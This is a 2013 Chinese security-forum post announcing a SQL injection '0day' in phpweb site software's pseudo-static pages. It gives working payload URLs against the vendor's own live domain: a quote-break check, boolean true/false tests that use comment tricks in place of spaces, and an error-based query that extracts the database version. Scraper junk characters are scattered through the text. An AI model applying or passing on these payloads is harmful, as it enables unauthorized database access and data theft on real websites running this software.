中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入5 ]) a. I6 D" a

; l: E( M. M" L( w3 B# `主站:http://phpweb.net/. q, n' C5 E, D
加’检测:4 |  K8 H  ~( X+ g

& c* ?2 I  T/ E$ i( Phttp://www.phpweb.net/down/html/?772′.html9 S; W( D( k  t! `

/ _7 n$ ?9 u4 z) Z$ c% m出错" B$ s* J( A" \1 O. w# p+ }
存在注入。
/ Z% G. i  J  N1 B$ m不能用空格,只能用/*罗
; T# G8 {1 z5 M4 p& u6 \6 E1 L0 ]" Fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
1 t" y: ]) d( ]5 R4 n * j# o! l+ Q! C! d8 ~# X; }# G
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 x. f6 o/ w: P% L
爆数据库版本:/ Z: ^* ]) B* ^5 S  I2 ?3 }
* z1 _* Y/ y# X; x( j
?
, `# n4 i  ^, w0 \8 M; m+ `1
6 \7 q. T, O2 A6 f% H  }http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
  H9 _( S& l* H7 c1 t: Q更新日期: 2013-01-03 13:39:50        # K: K9 v$ O8 c- {$ M7 b+ u




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2